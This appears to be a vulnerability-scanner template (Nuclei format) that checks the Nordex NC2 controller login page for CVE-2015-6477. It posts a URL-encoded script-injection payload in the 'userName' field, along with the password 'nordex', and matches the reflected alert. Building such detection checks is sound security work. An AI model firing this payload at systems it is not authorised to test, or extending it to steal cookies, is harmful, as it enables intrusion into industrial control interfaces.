33 lines
1.1 KiB
YAML
33 lines
1.1 KiB
YAML
id: CVE-2015-6477
|
|
|
|
info:
|
|
name: Nordex NC2 'username' Parameter XSS
|
|
author: geeknik
|
|
severity: medium
|
|
description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2015/Dec/117
|
|
- https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-6477
|
|
classification:
|
|
cve-id: CVE-2015-6477
|
|
tags: cve,cve2015,xss,iot,nordex,nc2
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/login"
|
|
body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert('{{randstr}}')</script>"
|